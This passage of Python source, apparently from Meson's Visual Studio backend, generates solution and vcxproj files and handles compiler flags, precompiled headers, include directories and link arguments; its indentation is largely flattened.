ofile.write('\tEndGlobalSection\n')
ofile.write('\tGlobalSection(SolutionProperties) = preSolution\n')
ofile.write('\t\tHideSolutionNode = FALSE\n')
ofile.write('\tEndGlobalSection\n')
if self.subdirs:
ofile.write('\tGlobalSection(NestedProjects) = '
'preSolution\n')
for p in projlist:
if p[1].parent != PurePath('.'):
ofile.write("\t\t{{{}}} = {{{}}}\n".format(p[2], self.subdirs[p[1].parent][0]))
for subdir in self.subdirs.values():
if subdir[1]:
ofile.write("\t\t{{{}}} = {{{}}}\n".format(subdir[0], subdir[1]))
ofile.write('\tEndGlobalSection\n')
ofile.write('EndGlobal\n')
replace_if_different(sln_filename, sln_filename_tmp)
def generate_projects(self):
startup_project = self.environment.coredata.options[OptionKey('backend_startup_project')].value
projlist = []
startup_idx = 0
for (i, (name, target)) in enumerate(self.build.targets.items()):
if startup_project and startup_project == target.get_basename():
startup_idx = i
outdir = Path(
self.environment.get_build_dir(),
self.get_target_dir(target)
)
outdir.mkdir(exist_ok=True, parents=True)
fname = name + '.vcxproj'
target_dir = PurePath(self.get_target_dir(target))
relname = target_dir / fname
projfile_path = outdir / fname
proj_uuid = self.environment.coredata.target_guids[name]
self.gen_vcxproj(target, str(projfile_path), proj_uuid)
projlist.append((name, relname, proj_uuid))
# Put the startup project first in the project list
if startup_idx:
            projlist = [projlist[startup_idx]] + projlist[0:startup_idx] + projlist[startup_idx + 1:]
return projlist
def split_sources(self, srclist):
sources = []
headers = []
objects = []
languages = []
for i in srclist:
if self.environment.is_header(i):
headers.append(i)
elif self.environment.is_object(i):
objects.append(i)
elif self.environment.is_source(i):
sources.append(i)
lang = self.lang_from_source_file(i)
if lang not in languages:
languages.append(lang)
elif self.environment.is_library(i):
pass
else:
# Everything that is not an object or source file is considered a header.
headers.append(i)
return sources, headers, objects, languages
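    # Illustrative example (plain strings used for brevity; real callers pass
    # File objects): split_sources(['a.c', 'a.h', 'b.obj', 'c.cpp']) would give
    # sources ['a.c', 'c.cpp'], headers ['a.h'], objects ['b.obj'] and
    # languages ['c', 'cpp'].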
def target_to_build_root(self, target):
if self.get_target_dir(target) == '':
return ''
directories = os.path.normpath(self.get_target_dir(target)).split(os.sep)
return os.sep.join(['..'] * len(directories))
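    # Illustrative example: for a target placed in 'sub/dir' this returns '..'
    # joined twice with os.sep (i.e. '..\\..' on Windows), the prefix needed to
    # reach the build root from the vcxproj directory.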
def quote_arguments(self, arr):
return ['"%s"' % i for i in arr]
def add_project_reference(self, root, include, projid, link_outputs=False):
ig = ET.SubElement(root, 'ItemGroup')
pref = ET.SubElement(ig, 'ProjectReference', Include=include)
ET.SubElement(pref, 'Project').text = '{%s}' % projid
if not link_outputs:
# Do not link in generated .lib files from dependencies automatically.
# We only use the dependencies for ordering and link in the generated
# objects and .lib files manually.
ET.SubElement(pref, 'LinkLibraryDependencies').text = 'false'
def add_target_deps(self, root, target):
target_dict = {target.get_id(): target}
for dep in self.get_target_deps(target_dict).values():
if dep.get_id() in self.handled_target_deps[target.get_id()]:
# This dependency was already handled manually.
continue
relpath = self.get_target_dir_relative_to(dep, target)
vcxproj = os.path.join(relpath, dep.get_id() + '.vcxproj')
tid = self.environment.coredata.target_guids[dep.get_id()]
self.add_project_reference(root, vcxproj, tid)
def create_basic_crap(self, target, guid):
project_name = target.name
root = ET.Element('Project', {'DefaultTargets': "Build",
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType')
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
ET.SubElement(type_config, 'UseOfMfc').text = 'false'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = target.get_id() + '\\'
tname = ET.SubElement(direlem, 'TargetName')
tname.text = target.name
return root
def gen_run_target_vcxproj(self, target, ofname, guid):
root = self.create_basic_crap(target, guid)
if not target.command:
            # FIXME: This is an alias target that doesn't run any command; there
            # is probably a better way than running this dummy command.
cmd_raw = python_command + ['-c', 'exit']
else:
_, _, cmd_raw = self.eval_custom_target_command(target)
depend_files = self.get_custom_target_depend_files(target)
target_env = self.get_run_target_env(target)
wrapper_cmd, _ = self.as_meson_exe_cmdline(target.name, target.command[0], cmd_raw[1:],
force_serialize=True, env=target_env,
verbose=True)
self.add_custom_build(root, 'run_target', ' '.join(self.quote_arguments(wrapper_cmd)),
deps=depend_files)
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.add_regen_dependency(root)
self.add_target_deps(root, target)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def gen_custom_target_vcxproj(self, target, ofname, guid):
root = self.create_basic_crap(target, guid)
# We need to always use absolute paths because our invocation is always
# from the target dir, not the build root.
target.absolute_paths = True
(srcs, ofilenames, cmd) = self.eval_custom_target_command(target, True)
depend_files = self.get_custom_target_depend_files(target, True)
# Always use a wrapper because MSBuild eats random characters when
# there are many arguments.
tdir_abs = os.path.join(self.environment.get_build_dir(), self.get_target_dir(target))
extra_bdeps = target.get_transitive_build_target_deps()
wrapper_cmd, _ = self.as_meson_exe_cmdline(target.name, target.command[0], cmd[1:],
# All targets run from the target dir
workdir=tdir_abs,
extra_bdeps=extra_bdeps,
capture=ofilenames[0] if target.capture else None,
force_serialize=True,
env=target.env)
if target.build_always_stale:
# Use a nonexistent file to always consider the target out-of-date.
ofilenames += [self.nonexistent_file(os.path.join(self.environment.get_scratch_dir(),
'outofdate.file'))]
self.add_custom_build(root, 'custom_target', ' '.join(self.quote_arguments(wrapper_cmd)),
deps=wrapper_cmd[-1:] + srcs + depend_files, outputs=ofilenames,
verify_files=not target.build_always_stale)
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.generate_custom_generator_commands(target, root)
self.add_regen_dependency(root)
self.add_target_deps(root, target)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
@classmethod
def lang_from_source_file(cls, src):
ext = src.split('.')[-1]
if ext in compilers.c_suffixes:
return 'c'
if ext in compilers.cpp_suffixes:
return 'cpp'
raise MesonException('Could not guess language from source file %s.' % src)
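    # Illustrative example: 'main.cpp' maps to 'cpp' and 'util.c' maps to 'c';
    # any other extension raises the MesonException above.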
def add_pch(self, pch_sources, lang, inc_cl):
if lang in pch_sources:
self.use_pch(pch_sources, lang, inc_cl)
def create_pch(self, pch_sources, lang, inc_cl):
pch = ET.SubElement(inc_cl, 'PrecompiledHeader')
pch.text = 'Create'
self.add_pch_files(pch_sources, lang, inc_cl)
def use_pch(self, pch_sources, lang, inc_cl):
pch = ET.SubElement(inc_cl, 'PrecompiledHeader')
pch.text = 'Use'
header = self.add_pch_files(pch_sources, lang, inc_cl)
pch_include = ET.SubElement(inc_cl, 'ForcedIncludeFiles')
pch_include.text = header + ';%(ForcedIncludeFiles)'
def add_pch_files(self, pch_sources, lang, inc_cl):
header = os.path.basename(pch_sources[lang][0])
pch_file = ET.SubElement(inc_cl, 'PrecompiledHeaderFile')
# When USING PCHs, MSVC will not do the regular include
# directory lookup, but simply use a string match to find the
# PCH to use. That means the #include directive must match the
# pch_file.text used during PCH CREATION verbatim.
# When CREATING a PCH, MSVC will do the include directory
# lookup to find the actual PCH header to use. Thus, the PCH
# header must either be in the include_directories of the target
# or be in the same directory as the PCH implementation.
pch_file.text = header
pch_out = ET.SubElement(inc_cl, 'PrecompiledHeaderOutputFile')
pch_out.text = '$(IntDir)$(TargetName)-%s.pch' % lang
return header
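    # Illustrative example of the wiring above (file names are assumptions):
    # with pch: ['pch.h', 'pch.cpp'] on a C++ target, each source gets
    #   <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
    #   <PrecompiledHeaderOutputFile>$(IntDir)$(TargetName)-cpp.pch</PrecompiledHeaderOutputFile>
    # so every '#include "pch.h"' must match that file name verbatim when the
    # PCH is used.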
def is_argument_with_msbuild_xml_entry(self, entry):
# Remove arguments that have a top level XML entry so
# they are not used twice.
# FIXME add args as needed.
if entry[1:].startswith('fsanitize'):
return True
return entry[1:].startswith('M')
def add_additional_options(self, lang, parent_node, file_args):
args = []
for arg in file_args[lang].to_native():
if self.is_argument_with_msbuild_xml_entry(arg):
continue
if arg == '%(AdditionalOptions)':
args.append(arg)
else:
args.append(self.escape_additional_option(arg))
ET.SubElement(parent_node, "AdditionalOptions").text = ' '.join(args)
def add_preprocessor_defines(self, lang, parent_node, file_defines):
defines = []
for define in file_defines[lang]:
if define == '%(PreprocessorDefinitions)':
defines.append(define)
else:
defines.append(self.escape_preprocessor_define(define))
ET.SubElement(parent_node, "PreprocessorDefinitions").text = ';'.join(defines)
def add_include_dirs(self, lang, parent_node, file_inc_dirs):
dirs = file_inc_dirs[lang]
ET.SubElement(parent_node, "AdditionalIncludeDirectories").text = ';'.join(dirs)
@staticmethod
def has_objects(objects, additional_objects, generated_objects):
# Ignore generated objects, those are automatically used by MSBuild because they are part of
# the CustomBuild Outputs.
return len(objects) + len(additional_objects) > 0
@staticmethod
def add_generated_objects(node, generated_objects):
# Do not add generated objects to project file. Those are automatically used by MSBuild, because
# they are part of the CustomBuild Outputs.
return
@staticmethod
def escape_preprocessor_define(define):
# See: https://msdn.microsoft.com/en-us/library/bb383819.aspx
table = str.maketrans({'%': '%25', '$': '%24', '@': '%40',
"'": '%27', ';': '%3B', '?': '%3F', '*': '%2A',
# We need to escape backslash because it'll be un-escaped by
# Windows during process creation when it parses the arguments
# Basically, this converts `\` to `\\`.
'\\': '\\\\'})
return define.translate(table)
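    # Illustrative example (made-up define): escape_preprocessor_define('FOO=a;b')
    # returns 'FOO=a%3Bb', and every backslash is doubled so it survives Windows
    # argument parsing.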
@staticmethod
def escape_additional_option(option):
# See: https://msdn.microsoft.com/en-us/library/bb383819.aspx
table = str.maketrans({'%': '%25', '$': '%24', '@': '%40',
"'": '%27', ';': '%3B', '?': '%3F', '*': '%2A', ' ': '%20'})
option = option.translate(table)
# Since we're surrounding the option with ", if it ends in \ that will
# escape the " when the process arguments are parsed and the starting
# " will not terminate. So we escape it if that's the case. I'm not
# kidding, this is how escaping works for process args on Windows.
if option.endswith('\\'):
option += '\\'
return f'"{option}"'
@staticmethod
def split_link_args(args):
"""
Split a list of link arguments into three lists:
* library search paths
* library filenames (or paths)
* other link arguments
"""
lpaths = []
libs = []
other = []
for arg in args:
if arg.startswith('/LIBPATH:'):
lpath = arg[9:]
# De-dup library search paths by removing older entries when
# a new one is found. This is necessary because unlike other
# search paths such as the include path, the library is
# searched for in the newest (right-most) search path first.
if lpath in lpaths:
lpaths.remove(lpath)
lpaths.append(lpath)
elif arg.startswith(('/', '-')):
other.append(arg)
# It's ok if we miss libraries with non-standard extensions here.
# They will go into the general link arguments.
elif arg.endswith('.lib') or arg.endswith('.a'):
# De-dup
if arg not in libs:
libs.append(arg)
else:
other.append(arg)
return lpaths, libs, other
def _get_cl_compiler(self, target):
for lang, c in target.compilers.items():
if lang in ('c', 'cpp'):
return c
# No source files, only objects, but we still need a compiler, so
# return a found compiler
if len(target.objects) > 0:
for lang, c in self.environment.coredata.compilers[target.for_machine].items():
if lang in ('c', 'cpp'):
return c
raise MesonException('Could not find a C or C++ compiler. MSVC can only build C/C++ projects.')
def _prettyprint_vcxproj_xml(self, tree, ofname):
ofname_tmp = ofname + '~'
tree.write(ofname_tmp, encoding='utf-8', xml_declaration=True)
        # ElementTree cannot do pretty-printing, so do it manually.
doc = xml.dom.minidom.parse(ofname_tmp)
with open(ofname_tmp, 'w', encoding='utf-8') as of:
of.write(doc.toprettyxml())
replace_if_different(ofname, ofname_tmp)
def gen_vcxproj(self, target, ofname, guid):
mlog.debug('Generating vcxproj %s.' % target.name)
subsystem = 'Windows'
self.handled_target_deps[target.get_id()] = []
if isinstance(target, build.Executable):
conftype = 'Application'
if target.gui_app is not None:
if not target.gui_app:
subsystem = 'Console'
else:
# If someone knows how to set the version properly,
# please send a patch.
subsystem = target.win_subsystem.split(',')[0]
elif isinstance(target, build.StaticLibrary):
conftype = 'StaticLibrary'
elif isinstance(target, build.SharedLibrary):
conftype = 'DynamicLibrary'
elif isinstance(target, build.CustomTarget):
return self.gen_custom_target_vcxproj(target, ofname, guid)
elif isinstance(target, build.RunTarget):
return self.gen_run_target_vcxproj(target, ofname, guid)
else:
raise MesonException('Unknown target type for %s' % target.get_basename())
# Prefix to use to access the build root from the vcxproj dir
down = self.target_to_build_root(target)
# Prefix to use to access the source tree's root from the vcxproj dir
proj_to_src_root = os.path.join(down, self.build_to_src)
# Prefix to use to access the source tree's subdir from the vcxproj dir
proj_to_src_dir = os.path.join(proj_to_src_root, self.get_target_dir(target))
(sources, headers, objects, languages) = self.split_sources(target.sources)
if self.is_unity(target):
sources = self.generate_unity_files(target, sources)
compiler = self._get_cl_compiler(target)
build_args = compiler.get_buildtype_args(self.buildtype)
build_args += compiler.get_optimization_args(self.optimization)
build_args += compiler.get_debug_args(self.debug)
build_args += compiler.sanitizer_compile_args(self.sanitize)
buildtype_link_args = compiler.get_buildtype_linker_args(self.buildtype)
vscrt_type = self.environment.coredata.options[OptionKey('b_vscrt')]
project_name = target.name
target_name = target.name
root = ET.Element('Project', {'DefaultTargets': "Build",
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
# Globals
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
ns = ET.SubElement(globalgroup, 'RootNamespace')
ns.text = target_name
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
# Start configuration
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType').text = conftype
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
# FIXME: Meson's LTO support needs to be integrated here
ET.SubElement(type_config, 'WholeProgramOptimization').text = 'false'
# Let VS auto-set the RTC level
ET.SubElement(type_config, 'BasicRuntimeChecks').text = 'Default'
# Incremental linking increases code size
if '/INCREMENTAL:NO' in buildtype_link_args:
ET.SubElement(type_config, 'LinkIncremental').text = 'false'
# Build information
compiles = ET.SubElement(root, 'ItemDefinitionGroup')
clconf = ET.SubElement(compiles, 'ClCompile')
# CRT type; debug or release
if vscrt_type.value == 'from_buildtype':
if self.buildtype == 'debug':
ET.SubElement(type_config, 'UseDebugLibraries').text = 'true'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDebugDLL'
else:
ET.SubElement(type_config, 'UseDebugLibraries').text = 'false'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDLL'
elif vscrt_type.value == 'static_from_buildtype':
if self.buildtype == 'debug':
ET.SubElement(type_config, 'UseDebugLibraries').text = 'true'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDebug'
else:
ET.SubElement(type_config, 'UseDebugLibraries').text = 'false'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreaded'
elif vscrt_type.value == 'mdd':
ET.SubElement(type_config, 'UseDebugLibraries').text = 'true'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDebugDLL'
elif vscrt_type.value == 'mt':
# FIXME, wrong
ET.SubElement(type_config, 'UseDebugLibraries').text = 'false'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreaded'
elif vscrt_type.value == 'mtd':
# FIXME, wrong
ET.SubElement(type_config, 'UseDebugLibraries').text = 'true'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDebug'
else:
ET.SubElement(type_config, 'UseDebugLibraries').text = 'false'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDLL'
# Sanitizers
if '/fsanitize=address' in build_args:
ET.SubElement(type_config, 'EnableASAN').text = 'true'
# Debug format
if '/ZI' in build_args:
ET.SubElement(clconf, 'DebugInformationFormat').text = 'EditAndContinue'
elif '/Zi' in build_args:
ET.SubElement(clconf, 'DebugInformationFormat').text = 'ProgramDatabase'
elif '/Z7' in build_args:
ET.SubElement(clconf, 'DebugInformationFormat').text = 'OldStyle'
else:
ET.SubElement(clconf, 'DebugInformationFormat').text = 'None'
# Runtime checks
if '/RTC1' in build_args:
ET.SubElement(clconf, 'BasicRuntimeChecks').text = 'EnableFastChecks'
elif '/RTCu' in build_args:
ET.SubElement(clconf, 'BasicRuntimeChecks').text = 'UninitializedLocalUsageCheck'
elif '/RTCs' in build_args:
ET.SubElement(clconf, 'BasicRuntimeChecks').text = 'StackFrameRuntimeCheck'
# Exception handling has to be set in the xml in addition to the "AdditionalOptions" because otherwise
# cl will give warning D9025: overriding '/Ehs' with cpp_eh value
if 'cpp' in target.compilers:
eh = self.environment.coredata.options[OptionKey('eh', machine=target.for_machine, lang='cpp')]
if eh.value == 'a':
ET.SubElement(clconf, 'ExceptionHandling').text = 'Async'
elif eh.value == 's':
ET.SubElement(clconf, 'ExceptionHandling').text = 'SyncCThrow'
elif eh.value == 'none':
ET.SubElement(clconf, 'ExceptionHandling').text = 'false'
else: # 'sc' or 'default'
ET.SubElement(clconf, 'ExceptionHandling').text = 'Sync'
# End configuration
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
generated_files, custom_target_output_files, generated_files_include_dirs = self.generate_custom_generator_commands(target, root)
(gen_src, gen_hdrs, gen_objs, gen_langs) = self.split_sources(generated_files)
(custom_src, custom_hdrs, custom_objs, custom_langs) = self.split_sources(custom_target_output_files)
gen_src += custom_src
gen_hdrs += custom_hdrs
gen_langs += custom_langs
# Project information
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = target.get_id() + '\\'
tfilename = os.path.splitext(target.get_filename())
ET.SubElement(direlem, 'TargetName').text = tfilename[0]
ET.SubElement(direlem, 'TargetExt').text = tfilename[1]
# Arguments, include dirs, defines for all files in the current target
target_args = []
target_defines = []
target_inc_dirs = []
# Arguments, include dirs, defines passed to individual files in
# a target; perhaps because the args are language-specific
#
# file_args is also later split out into defines and include_dirs in
# case someone passed those in there
file_args = {l: c.compiler_args() for l, c in target.compilers.items()}
file_defines = {l: [] for l in target.compilers}
file_inc_dirs = {l: [] for l in target.compilers}
# The order in which these compile args are added must match
# generate_single_compile() and generate_basic_compiler_args()
for l, comp in target.compilers.items():
if l in file_args:
file_args[l] += compilers.get_base_compile_args(
self.get_base_options_for_target(target), comp)
file_args[l] += comp.get_option_compile_args(
self.environment.coredata.options)
# Add compile args added using add_project_arguments()
for l, args in self.build.projects_args[target.for_machine].get(target.subproject, {}).items():
if l in file_args:
file_args[l] += args
# Add compile args added using add_global_arguments()
# These override per-project arguments
for l, args in self.build.global_args[target.for_machine].items():
if l in file_args:
file_args[l] += args
# Compile args added from the env or cross file: CFLAGS/CXXFLAGS, etc. We want these
# to override all the defaults, but not the per-target compile args.
for l in file_args.keys():
opts = self.environment.coredata.options[OptionKey('args', machine=target.for_machine, lang=l)]
file_args[l] += opts.value
for args in file_args.values():
# This is where Visual Studio will insert target_args, target_defines,
# etc, which are added later from external deps (see below).
args += ['%(AdditionalOptions)', '%(PreprocessorDefinitions)', '%(AdditionalIncludeDirectories)']
# Add custom target dirs as includes automatically, but before
# target-specific include dirs. See _generate_single_compile() in
# the ninja backend for caveats.
args += ['-I' + arg for arg in generated_files_include_dirs]
# Add include dirs from the `include_directories:` kwarg on the target
# and from `include_directories:` of internal deps of the target.
#
# Target include dirs should override internal deps include dirs.
# This is handled in BuildTarget.process_kwargs()
#
# Include dirs from internal deps should override include dirs from
# external deps and must maintain the order in which they are
# specified. Hence, we must reverse so that the order is preserved.
#
# These are per-target, but we still add them as per-file because we
# need them to be looked in first.
for d in reversed(target.get_include_dirs()):
# reversed is used to keep order of includes
for i in reversed(d.get_incdirs()):
curdir = os.path.join(d.get_curdir(), i)
args.append('-I' + self.relpath(curdir, target.subdir)) # build dir
args.append('-I' + os.path.join(proj_to_src_root, curdir)) # src dir
for i in d.get_extra_build_dirs():
curdir = os.path.join(d.get_curdir(), i)
args.append('-I' + self.relpath(curdir, target.subdir)) # build dir
# Add per-target compile args, f.ex, `c_args : ['/DFOO']`. We set these
# near the end since these are supposed to override everything else.
for l, args in target.extra_args.items():
if l in file_args:
file_args[l] += args
# The highest priority includes. In order of directory search:
# target private dir, target build dir, target source dir
for args in file_args.values():
t_inc_dirs = [self.relpath(self.get_target_private_dir(target),
self.get_target_dir(target))]
if target.implicit_include_directories:
t_inc_dirs += ['.', proj_to_src_dir]
args += ['-I' + arg for arg in t_inc_dirs]
# Split preprocessor defines and include directories out of the list of
# all extra arguments. The rest go into %(AdditionalOptions).
for l, args in file_args.items():
for arg in args[:]:
if arg.startswith(('-D', '/D')) or arg == '%(PreprocessorDefinitions)':
file_args[l].remove(arg)
# Don't escape the marker
if arg == '%(PreprocessorDefinitions)':
define = arg
else:
define = arg[2:]
# De-dup
if define not in file_defines[l]:
file_defines[l].append(define)
elif arg.startswith(('-I', '/I')) or arg == '%(AdditionalIncludeDirectories)':
file_args[l].remove(arg)
# Don't escape the marker
if arg == '%(AdditionalIncludeDirectories)':
inc_dir = arg
else:
inc_dir = arg[2:]
# De-dup
if inc_dir not in file_inc_dirs[l]:
file_inc_dirs[l].append(inc_dir)
# Add include dirs to target as well so that "Go to Document" works in headers
if inc_dir not in target_inc_dirs:
target_inc_dirs.append(inc_dir)
# Split compile args needed to find external dependencies
# Link args are added while generating the link command
for d in reversed(target.get_external_deps()):
# Cflags required by external deps might have UNIX-specific flags,
# so filter them out if needed
if isinstance(d, dependencies.OpenMPDependency):
ET.SubElement(clconf, 'OpenMPSupport').text = 'true'
else:
d_compile_args = compiler.unix_args_to_native(d.get_compile_args())
for arg in d_compile_args:
if arg.startswith(('-D', '/D')):
define = arg[2:]
# De-dup
if define in target_defines:
target_defines.remove(define)
target_defines.append(define)
elif arg.startswith(('-I', '/I')):
inc_dir = arg[2:]
# De-dup
if inc_dir not in target_inc_dirs:
target_inc_dirs.append(inc_dir)
else:
target_args.append(arg)
languages += gen_langs
if '/Gw' in build_args:
target_args.append('/Gw')
if len(target_args) > 0:
target_args.append('%(AdditionalOptions)')
ET.SubElement(clconf, "AdditionalOptions").text = ' '.join(target_args)
ET.SubElement(clconf, 'AdditionalIncludeDirectories').text = ';'.join(target_inc_dirs)
target_defines.append('%(PreprocessorDefinitions)')
ET.SubElement(clconf, 'PreprocessorDefinitions').text = ';'.join(target_defines)
ET.SubElement(clconf, 'FunctionLevelLinking').text = 'true'
# Warning level
warning_level = self.get_option_for_target(OptionKey('warning_level'), target)
ET.SubElement(clconf, 'WarningLevel').text = 'Level' + str(1 + int(warning_level))
if self.get_option_for_target(OptionKey('werror'), target):
ET.SubElement(clconf, 'TreatWarningAsError').text = 'true'
# Optimization flags
o_flags = split_o_flags_args(build_args)
if '/Ox' in o_flags:
ET.SubElement(clconf, 'Optimization').text = 'Full'
elif '/O2' in o_flags:
ET.SubElement(clconf, 'Optimization').text = 'MaxSpeed'
elif '/O1' in o_flags:
ET.SubElement(clconf, 'Optimization').text = 'MinSpace'
elif '/Od' in o_flags:
ET.SubElement(clconf, 'Optimization').text = 'Disabled'
if '/Oi' in o_flags:
ET.SubElement(clconf, 'IntrinsicFunctions').text = 'true'
if '/Ob1' in o_flags:
ET.SubElement(clconf, 'InlineFunctionExpansion').text = 'OnlyExplicitInline'
elif '/Ob2' in o_flags:
ET.SubElement(clconf, 'InlineFunctionExpansion').text = 'AnySuitable'
# Size-preserving flags
if '/Os' in o_flags:
ET.SubElement(clconf, 'FavorSizeOrSpeed').text = 'Size'
else:
ET.SubElement(clconf, 'FavorSizeOrSpeed').text = 'Speed'
# Note: SuppressStartupBanner is /NOLOGO and is 'true' by default
pch_sources = {}
if self.environment.coredata.options.get(OptionKey('b_pch')):
for lang in ['c', 'cpp']:
pch = target.get_pch(lang)
if not pch:
continue
if compiler.id == 'msvc':
if len(pch) == 1:
# Auto generate PCH.
src = os.path.join(down, self.create_msvc_pch_implementation(target, lang, pch[0]))
pch_header_dir = os.path.dirname(os.path.join(proj_to_src_dir, pch[0]))
else:
src = os.path.join(proj_to_src_dir, pch[1])
pch_header_dir = None
pch_sources[lang] = [pch[0], src, lang, pch_header_dir]
else:
                    # I don't know whether it's relevant, but let's handle other
                    # compilers used with a VS backend.
pch_sources[lang] = [pch[0], None, lang, None]
resourcecompile = ET.SubElement(compiles, 'ResourceCompile')
ET.SubElement(resourcecompile, 'PreprocessorDefinitions')
# Linker options
link = ET.SubElement(compiles, 'Link')
extra_link_args = compiler.compiler_args()
# FIXME: Can these buildtype linker args be added as tags in the
# vcxproj file (similar to buildtype compiler args) instead of in
# AdditionalOptions?
extra_link_args += compiler.get_buildtype_linker_args(self.buildtype)
# Generate Debug info
if self.debug:
self.generate_debug_information(link)
else:
ET.SubElement(link, 'GenerateDebugInformation').text = 'false'
if not isinstance(target, build.StaticLibrary):
if isinstance(target, build.SharedModule):
options = self.environment.coredata.options
extra_link_args += compiler.get_std_shared_module_link_args(options)
# Add link args added using add_project_link_arguments()
extra_link_args += self.build.get_project_link_args(compiler, target.subproject, target.for_machine)
# Add link args added using add_global_link_arguments()
# These override per-project link arguments
extra_link_args += self.build.get_global_link_args(compiler, target.for_machine)
# Link args added from the env: LDFLAGS, or the cross file. We want
# these to override all the defaults but not the per-target link
# args.
extra_link_args += self.environment.coredata.get_external_link_args(target.for_machine, compiler.get_language())
# Only non-static built targets need link args and link dependencies
extra_link_args += target.link_args
# External deps must be last because target link libraries may depend on them.
for dep in target.get_external_deps():
# Extend without reordering or de-dup to preserve `-L -l` sets
# https://github.com/mesonbuild/meson/issues/1718
if isinstance(dep, dependencies.OpenMPDependency):
                    ET.SubElement(clconf, 'OpenMPSupport').text = 'true'
else:
extra_link_args.extend_direct(dep.get_link_args())
for d in target.get_dependencies():
if isinstance(d, build.StaticLibrary):
for dep in d.get_external_deps():
if isinstance(dep, dependencies.OpenMPDependency):
                            ET.SubElement(clconf, 'OpenMPSupport').text = 'true'
else:
extra_link_args.extend_direct(dep.get_link_args())
# Add link args for c_* or cpp_* build options. Currently this only
# adds c_winlibs and cpp_winlibs when building for Windows. This needs
# to be after all internal and external libraries so that unresolved
# symbols from those can be found here. This is needed when the
# *_winlibs that we want to link to are static mingw64 libraries.
extra_link_args += compiler.get_option_link_args(self.environment.coredata.options)
(additional_libpaths, additional_links, extra_link_args) = self.split_link_args(extra_link_args.to_native())
# Add more libraries to be linked if needed
for t in target.get_dependencies():
if isinstance(t, build.CustomTargetIndex):
# We don't need the actual project here, just the library name
lobj = t
else:
lobj = self.build.targets[t.get_id()]
linkname = os.path.join(down, self.get_target_filename_for_linking(lobj))
if t in target.link_whole_targets:
# /WHOLEARCHIVE:foo must go into AdditionalOptions
extra_link_args += compiler.get_link_whole_for(linkname)
# To force Visual Studio to build this project even though it
# has no sources, we include a reference to the vcxproj file
# that builds this target. Technically we should add this only
# if the current target has no sources, but it doesn't hurt to
# have 'extra' references.
trelpath = self.get_target_dir_relative_to(t, target)
tvcxproj = os.path.join(trelpath, t.get_id() + '.vcxproj')
tid = self.environment.coredata.target_guids[t.get_id()]
self.add_project_reference(root, tvcxproj, tid, link_outputs=True)
# Mark the dependency as already handled to not have
# multiple references to the same target.
self.handled_target_deps[target.get_id()].append(t.get_id())
else:
# Other libraries go into AdditionalDependencies
if linkname not in additional_links:
additional_links.append(linkname)
